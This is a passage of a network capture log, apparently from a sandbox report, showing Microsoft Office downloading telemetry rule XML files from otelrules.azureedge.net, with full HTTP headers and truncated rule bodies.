2024-11-14 14:25:25 UTC    486                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID    Source IP      Source Port    Destination IP    Destination Port
36            192.168.2.5    49745          13.107.246.45     443

Timestamp                  Bytes transferred    Direction    Data
2024-11-14 14:25:26 UTC    192                  OUT          GET /rules/rule120639v0s19.xml HTTP/1.1
                                                             Connection: Keep-Alive
                                                             Accept-Encoding: gzip
                                                             User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                             Host: otelrules.azureedge.net
2024-11-14 14:25:26 UTC    470                  IN           HTTP/1.1 200 OK
                                                             Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                             Content-Type: text/xml
                                                             Content-Length: 423
                                                             Connection: close
                                                             Cache-Control: public, max-age=604800, immutable
                                                             Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                             ETag: "0x8DC582BB7564CE8"
                                                             x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                                             x-ms-version: 2018-03-28
                                                             x-azure-ref: 20241114T142526Z-16547b76f7fk9g8vhC1DFW825400000000m000000000h8xr
                                                             x-fd-int-roxy-purgeid: 0
                                                             X-Cache: TCP_HIT
                                                             Accept-Ranges: bytes
2024-11-14 14:25:26 UTC    423                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


Session ID    Source IP      Source Port    Destination IP    Destination Port
37            192.168.2.5    49746          13.107.246.45     443

Timestamp                  Bytes transferred    Direction    Data
2024-11-14 14:25:26 UTC    192                  OUT          GET /rules/rule120640v0s19.xml HTTP/1.1
                                                             Connection: Keep-Alive
                                                             Accept-Encoding: gzip
                                                             User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                             Host: otelrules.azureedge.net
2024-11-14 14:25:26 UTC    470                  IN           HTTP/1.1 200 OK
                                                             Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                             Content-Type: text/xml
                                                             Content-Length: 478
                                                             Connection: close
                                                             Cache-Control: public, max-age=604800, immutable
                                                             Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                             ETag: "0x8DC582B9B233827"
                                                             x-ms-request-id: aa8338a3-a01e-0021-72a2-34814c000000
                                                             x-ms-version: 2018-03-28
                                                             x-azure-ref: 20241114T142526Z-r178fb8d765hbcjvhC1DFW50zc00000002sg00000000118x
                                                             x-fd-int-roxy-purgeid: 0
                                                             X-Cache: TCP_HIT
                                                             Accept-Ranges: bytes
2024-11-14 14:25:26 UTC | 478 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
38 | 192.168.2.5 | 49747 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:26 UTC | 192 | OUT | GET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fce7b0bb-601e-0050-294b-352c9c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-1749fc9bdbdns7kfhC1DFWb6c400000002n000000000k5np
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:26 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session ID | Source IP | Source Port | Destination IP | Destination Port
39 | 192.168.2.5 | 49748 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:26 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9993dcf0-c01e-0046-3a0d-362db9000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-1749fc9bdbdlzhmchC1DFWe68s00000002d000000000h7nc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:26 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
40 | 192.168.2.5 | 49749 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:26 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:26 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: a8264c91-f01e-0052-7a79-369224000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-r178fb8d765mr9nqhC1DFWs8m800000000t000000000gze4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:26 UTC | 400 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


Session ID | Source IP | Source Port | Destination IP | Destination Port
41 | 192.168.2.5 | 49750 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:27 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:27 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:27 GMT
Content-Type: text/xml
Content-Length: 479
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
ETag: "0x8DC582BB7D702D0"
x-ms-request-id: 87bd4a9e-701e-0021-04a0-343d45000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142527Z-1749fc9bdbdlfqrwhC1DFWmyg800000000m000000000f84t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:27 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
42 | 192.168.2.5 | 49751 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:27 UTC | 192 | OUT | GET /rules/rule120645v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:27 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:27 GMT
Content-Type: text/xml
Content-Length: 425
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BBA25094F"
x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142527Z-16547b76f7fdf69shC1DFWcpd00000000ks0000000003nyc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:27 UTC | 425 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


Session ID | Source IP | Source Port | Destination IP | Destination Port
43 | 192.168.2.5 | 49752 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:27 UTC | 192 | OUT | GET /rules/rule120646v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:27 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:27 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
ETag: "0x8DC582BB2BE84FD"
x-ms-request-id: 03686f8b-301e-0099-32a0-346683000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142527Z-r178fb8d7654njfdhC1DFWd04800000002mg00000000991w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:27 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
44 | 192.168.2.5 | 49753 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:27 UTC | 192 | OUT | GET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:27 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e5a1bf30-b01e-005c-3c12-364c66000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-1749fc9bdbdlfqrwhC1DFWmyg800000000t0000000001sw7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:27 UTC | 448 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


Session ID | Source IP | Source Port | Destination IP | Destination Port
45 | 192.168.2.5 | 49754 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:27 UTC | 192 | OUT | GET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d6de3b9d-801e-00a0-7812-362196000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-1749fc9bdbdr6qwphC1DFW0nv400000002v00000000008mf
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:27 UTC | 491 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.5 | 49755 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:28 UTC | 192 | OUT | GET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:28 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 46e97820-b01e-0097-069a-364f33000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-r178fb8d765z9wvrhC1DFW1a0s00000000rg00000000cgns
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:28 UTC | 416 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.5 | 49756 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:28 UTC | 192 | OUT | GET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 100aec20-201e-006e-1215-2dbbe3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-16547b76f7fp46ndhC1DFW66zg0000000ks000000000g0cb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:28 UTC | 479 | IN |
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID: 48 | Source IP: 192.168.2.5 | Source Port: 49757 | Destination IP: 13.107.246.45 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:28 UTC | 192 | OUT | GET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-16547b76f7f9bs6dhC1DFWt3rg0000000kng00000000mhba
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:28 UTC | 415 | IN |
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID: 49 | Source IP: 192.168.2.5 | Source Port: 49759 | Destination IP: 13.107.246.45 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:28 UTC | 192 | OUT | GET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: f331b8e7-a01e-0070-470c-36573b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-1749fc9bdbdlzhmchC1DFWe68s00000002e000000000dyzc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:28 UTC | 419 | IN |
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID: 50 | Source IP: 192.168.2.5 | Source Port: 49758 | Destination IP: 13.107.246.45 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:28 UTC | 192 | OUT | GET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 0d7aed76-401e-0035-4255-3582d8000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-1749fc9bdbds4vwlhC1DFWz44000000002f000000000gutn
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:28 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.5 | 49760 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:29 UTC | 192 | OUT | GET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:29 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                        Connection: close
